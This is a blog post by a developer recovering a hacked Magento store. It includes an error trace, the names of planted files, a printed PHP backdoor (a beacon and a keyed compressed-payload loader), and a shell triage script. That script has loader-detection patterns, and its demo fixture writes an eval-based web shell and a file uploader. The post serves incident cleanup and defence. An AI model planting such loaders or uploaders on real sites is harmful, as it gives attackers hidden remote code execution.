
Just to clarify, I hate Magento with a passion. I find it cumbersome and unbelievably bloated, and the filing system is a minefield. Not to mention, the community and support is a complete joke. I could go on forever about their shortfalls, but I won’t. Hopefully you get a sense of my despair, though.

Unfortunately, we’ve been working with a client for a few years that has a Magento ecomm website (our first and last Magento client, that’s for sure). We genuinely dread whenever he wants any updates.

I don’t usually provide Magento support or bug fixes, but my conscience won’t allow me to carry on with life without guilt unless I document this fix, because I tried Googling for an answer and looking to the community for help, but I got nowhere!! I wouldn’t wish my last 16 hours (yes, that’s how long I’ve been working on a solution) on my worst enemy.

Anyways, this morning we were notified of a rather alarming error, which looked like this:

[Screenshot: a Magento error message displayed where the product price should be]

That error had replaced what would normally be the “price” of a product.

We had no idea why it was occurring, but it was obviously serious. So serious that the website was unusable, and we couldn’t even log into the admin control panel, because it was also riddled with related errors:

Unknown number format type 'boolean'. Format '' must be a valid number format string.
#0 /var/www/vhosts//httpdocs/lib/Zend/Locale/Format.php(305): Zend_Locale_Format::_checkOptions(Array)
#1 /var/www/vhosts//httpdocs/lib/Zend/Currency.php(186): Zend_Locale_Format::toNumber('0.000000', Array)
#2 /var/www/vhosts//httpdocs/app/code/core/Mage/Directory/Model/Currency.php(233): Zend_Currency->toCurrency('0.000000', Array)
#3 /var/www/vhosts//httpdocs/app/code/core/Mage/Directory/Model/Currency.php(216): Mage_Directory_Model_Currency->formatTxt(NULL, Array)
#4 /var/www/vhosts//httpdocs/app/code/core/Mage/Directory/Model/Currency.php(197): Mage_Directory_Model_Currency->formatPrecision(NULL, 2, Array, true, false)
#5 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard/Bar.php(82): Mage_Directory_Model_Currency->format(NULL)
#6 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard/Bar.php(62): Mage_Adminhtml_Block_Dashboard_Bar->format(NULL)
#7 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard/Totals.php(74): Mage_Adminhtml_Block_Dashboard_Bar->addTotal('Revenue', NULL)
#8 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Block/Abstract.php(238): Mage_Adminhtml_Block_Dashboard_Totals->_prepareLayout()
#9 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(456): Mage_Core_Block_Abstract->setLayout(Object(Mage_Core_Model_Layout))
#10 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard.php(50): Mage_Core_Model_Layout->createBlock('adminhtml/dashb...')
#11 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Block/Abstract.php(238): Mage_Adminhtml_Block_Dashboard->_prepareLayout()
#12 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(456): Mage_Core_Block_Abstract->setLayout(Object(Mage_Core_Model_Layout))
#13 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(472): Mage_Core_Model_Layout->createBlock('adminhtml/dashb...', 'dashboard')
#14 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(239): Mage_Core_Model_Layout->addBlock('adminhtml/dashb...', 'dashboard')
#15 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(205): Mage_Core_Model_Layout->_generateBlock(Object(Mage_Core_Model_Layout_Element), Object(Mage_Core_Model_Layout_Element))
#16 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(210): Mage_Core_Model_Layout->generateBlocks(Object(Mage_Core_Model_Layout_Element))
#17 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Action.php(344): Mage_Core_Model_Layout->generateBlocks()
#18 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Action.php(269): Mage_Core_Controller_Varien_Action->generateLayoutBlocks()
#19 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Controller/Action.php(275): Mage_Core_Controller_Varien_Action->loadLayout(NULL, true, true)
#20 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/controllers/DashboardController.php(40): Mage_Adminhtml_Controller_Action->loadLayout()
#21 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Action.php(419): Mage_Adminhtml_DashboardController->indexAction()
#22 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Router/Standard.php(250): Mage_Core_Controller_Varien_Action->dispatch('index')
#23 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Front.php(176): Mage_Core_Controller_Varien_Router_Standard->match(Object(Mage_Core_Controller_Request_Http))
#24 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/App.php(354): Mage_Core_Controller_Varien_Front->dispatch()
#25 /var/www/vhosts//httpdocs/app/Mage.php(683): Mage_Core_Model_App->run(Array)
#26 /var/www/vhosts//httpdocs/index.php(87): Mage::run('', 'store')

I tried Googling endlessly (I went as far back as page 10 of the results) and even reduced myself to Bing and Yahoo, with no luck at all. All I found were a few solutions involving memcache, but that wasn’t our problem, because the website doesn’t even have memcache enabled. If you’re experiencing this problem or something similar after installing memcache, this thread on Stack Overflow might be helpful.

Interestingly though, I found a bunch of other Magento websites (clearly abandoned) showing the same errors, this website for example. Looks like the owner gave up (don’t blame him/her)!

Solution

If enabling a caching system didn’t cause the problem, then I’m afraid it’s quite possible that your website’s security has been compromised. That was our problem.

After spending ten hours trying to diagnose the problem, I noticed some odd files lurking around, and that’s when it struck me: the website had been hacked.

Step 1: delete malicious files
I found and deleted the following files, which were clearly malicious:

ml.php
unzip.php
testosteron.php
mainconfig.php

This is an example of what some of the files contained:

<?php
// Beacon: any request carrying q=1 gets a bare "200" back, so whoever planted the
// file can cheaply confirm it is still in place.
if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;}
// Keyed loader: only with the right "key" is the POSTed "chk" value base64-decoded
// and gzip-inflated, so the payload itself never appears in plain text.
if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="[email protected]%WsJaz7EKX1DhMr&")sprintf(gzuncompress(base64_decode($_POST["chk"])));
?>

A few of the other files contained file-upload forms/code, which was clearly suspicious and dangerous. Note that, as shown above, the decoded payload is handed to sprintf(), which only returns a string; whether the original used eval() or this copy was defanged, the shape (a cheap liveness check plus a keyed, compressed payload channel) is a standard loader pattern. The key string has also been partly mangled into "[email protected]" in this copy, so don’t rely on it as a search signature.

Nasty stuff.

I basically went through every folder (yes, it’s very time-consuming) looking for recently modified files, and then checked their contents. You can often spot a suspicious file by its name too (e.g. testosteron.php), so I was also on the lookout for those. Names are a weak signal, though: a dropper can just as easily be called config.php, so modification time and contents are what count. If you have a clean copy of the same Magento release, a recursive comparison against it is far quicker than eyeballing folders.

Step 2: Zend framework
I *think* the Zend framework files were heavily infected, or at least something was wrong in there. The admin trace backs that up: the dashboard asks Mage_Directory_Model_Currency to format a NULL revenue total, Zend_Currency passes its options on to Zend_Locale_Format, and the 'format' option arrives as a boolean instead of a number-format string, which is exactly the check that throws.

So I deleted the contents of the /tmp folder, which was full of zend_cache files and uploaded versions from a previous backup.

I also did the same with /app/code/core/Zend and /lib/Zend (this folder is quite big!): deleted them both and uploaded versions from a clean backup. Both trees should match the release exactly, so anything in there that a clean copy doesn’t have is suspect.

Step 3: Empty Cache
I deleted the cache folder, /var/cache, and all the sessions, /var/session (probably not essential, but I did it anyway). Clearing the cache is worth doing regardless: Magento caches configuration and layout there, so a poisoned entry can survive a file restore.
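The three steps above, mechanised as an added example (this is not code from the original post or from Magento). It assumes a POSIX shell with standard find/grep/cmp, that the first argument is the compromised document root and the second an untouched extract of the same Magento release to compare against; the sample tree it builds is constructed here purely to demonstrate the checks.

```shell
#!/bin/sh
# Added example, not code from the original post. Triage helpers for a
# Magento 1 webroot: recent files, loader-style PHP, Zend tree drift
# against a clean release, and a cache/session flush.

# Step 1a: files touched in the last DAYS days (default 14), skipping
# runtime directories that churn constantly and would drown the signal.
recent_files() {
    webroot=$1; days=${2:-14}
    find "$webroot" -type f -mtime "-$days" \
        ! -path '*/var/cache/*' ! -path '*/var/session/*' ! -path '*/var/log/*' \
        | sort
}

# Step 1b: PHP whose contents match the loader pattern shown above
# (compressed/base64 payload, or request data fed straight to eval/assert),
# plus any PHP sitting in directories that should only hold uploads or assets.
suspicious_php() {
    webroot=$1
    {
        find "$webroot" -type f -name '*.php' -exec grep -lE \
            'gzuncompress\(base64_decode|base64_decode\(\$_(POST|REQUEST|GET|COOKIE)|(eval|assert)\(\$_(POST|REQUEST|GET|COOKIE)' {} +
        find "$webroot/media" "$webroot/skin" "$webroot/var" -type f -name '*.php' 2>/dev/null
    } | sort -u
}

# Step 2: rather than blindly re-uploading, list what in the Zend trees differs
# from the clean release (MODIFIED) or has no clean counterpart at all (ADDED).
zend_drift() {
    webroot=$1; clean=$2
    for d in lib/Zend app/code/core/Zend; do
        [ -d "$webroot/$d" ] || continue
        find "$webroot/$d" -type f | while read -r f; do
            rel=${f#"$webroot"/}
            if [ ! -f "$clean/$rel" ]; then
                echo "ADDED    $rel"
            elif ! cmp -s "$clean/$rel" "$f"; then
                echo "MODIFIED $rel"
            fi
        done
    done | sort
}

# Step 3: drop cached config/layout and all sessions so nothing poisoned survives.
flush_runtime_state() {
    webroot=$1
    for d in var/cache var/session; do
        [ -d "$webroot/$d" ] && find "$webroot/$d" -type f -exec rm -f {} +
    done
    return 0
}

# Constructed fixture (not a real site): an old legitimate core file, a planted
# loader, a PHP uploader under media/, a tampered and an added Zend file, some
# cache/session junk, and a matching clean reference tree.
build_sample_tree() {
    root=$1
    mkdir -p "$root/web/app/code/core/Mage" "$root/web/lib/Zend" "$root/web/media" \
             "$root/web/var/cache" "$root/web/var/session" "$root/clean/lib/Zend"
    echo '<?php class Mage_Core_Model_App {}' > "$root/web/app/code/core/Mage/App.php"
    touch -t 200001010000 "$root/web/app/code/core/Mage/App.php"   # old, legitimate
    printf '%s\n' '<?php if(isset($_POST["chk"])) eval(gzuncompress(base64_decode($_POST["chk"])));' \
        > "$root/web/testosteron.php"                              # planted loader
    echo '<?php move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"]);' \
        > "$root/web/media/uploader.php"                           # PHP where none belongs
    echo '<?php class Zend_Currency { /* original */ }' > "$root/clean/lib/Zend/Currency.php"
    echo '<?php class Zend_Currency { /* tampered */ }' > "$root/web/lib/Zend/Currency.php"
    echo '<?php /* not part of any Zend release */' > "$root/web/lib/Zend/Extra.php"
    echo cached > "$root/web/var/cache/mage---config"
    echo sess > "$root/web/var/session/sess_abc"
}

demo_root=$(mktemp -d)
build_sample_tree "$demo_root"
echo "== recent files";   recent_files "$demo_root/web"
echo "== suspicious php"; suspicious_php "$demo_root/web"
echo "== zend drift";     zend_drift "$demo_root/web" "$demo_root/clean"
flush_runtime_state "$demo_root/web"
rm -rf "$demo_root"
```

On a real site, run the functions against the live document root and a fresh extract of the same Magento version; treat every ADDED line in the Zend trees and every hit from suspicious_php as something to read before deleting, since the contents tell you what the attacker could do and what else to look for.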

Thankfully that resolved my problem and the website was up and running once again! I pray to God no one else has to suffer like I did over this issue. Bear in mind that this removes what was found; it doesn’t tell you how they got in. At the very least, change every admin and database password, check for admin users you didn’t create, and keep watching for new or modified files over the following weeks.

Please let me know if this helps you out!
